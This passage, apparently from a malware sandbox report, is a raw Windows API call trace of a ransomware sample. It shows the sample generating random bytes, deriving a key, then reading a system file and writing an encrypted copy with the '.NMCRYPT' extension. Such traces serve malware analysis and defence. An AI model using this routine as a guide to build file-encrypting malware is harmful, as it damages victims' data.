dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.329] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.330] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.331] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e150 | out: pbBuffer=0x2d7e150) returned 1 [0148.331] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.331] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e16c*=0x100) returned 1 [0148.332] CryptCreateHash (in: hProv=0x8e2f78, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44474c | out: phHash=0x1d44474c) returned 1 [0148.332] CryptHashData (hHash=0x9ad7f8, pbData=0x2d7e1f0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0148.332] CryptDeriveKey (in: hProv=0x8e2f78, Algid=0x6610, hBaseData=0x9ad7f8, dwFlags=0x4, phKey=0x1d444750 | out: phKey=0x1d444750*=0x9ad478) returned 1 [0148.332] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7e2f0, dwFlags=0x0) returned 1 [0148.332] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7e1a0*=0x1, dwFlags=0x0) returned 1 [0148.332] wcslen (_String="\\\\?\\") returned 0x4 [0148.332] CryptDuplicateKey (in: hKey=0x9ad478, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e174 | out: phKey=0x2d7e174*=0x9ad438) returned 1 [0148.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0148.332] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\da-DK\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\da-dk\\tipresx.dll.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0148.333] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e164 | out: lpFileSize=0x2d7e164*=8192) returned 1 [0148.333] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e15c*=0x200, lpOverlapped=0x0) returned 1 [0148.333] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.334] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.334] GetLastError () returned 0x0 [0148.334] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.335] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.336] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.336] GetLastError () returned 0x0 [0148.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.336] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.336] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.336] GetLastError () returned 0x0 [0148.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.336] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.336] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.336] GetLastError () returned 0x0 [0148.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.336] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.336] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.336] GetLastError () returned 0x0 [0148.336] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.336] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.337] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.337] GetLastError () returned 0x0 [0148.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.337] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.337] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.337] GetLastError () returned 0x0 [0148.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.337] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.337] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.337] GetLastError () returned 0x0 [0148.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.337] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.337] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.337] GetLastError () returned 0x0 [0148.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.337] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.337] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.337] GetLastError () returned 0x0 [0148.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.337] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.337] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.337] GetLastError () returned 0x0 [0148.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.337] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.337] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100) returned 1 [0148.337] GetLastError () returned 0x0 [0148.337] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e15c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e15c*=0x100, lpOverlapped=0x0) returned 1 [0148.338] ReadFile (in: hFile=0x1624, lpBuffer=0x29012e8, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e160, lpOverlapped=0x0 | out: lpBuffer=0x29012e8*, lpNumberOfBytesRead=0x2d7e160*=0x100, lpOverlapped=0x0) returned 1 [0148.338] CryptEncrypt (in: hKey=0x9ad438, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e148*=0x100, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, 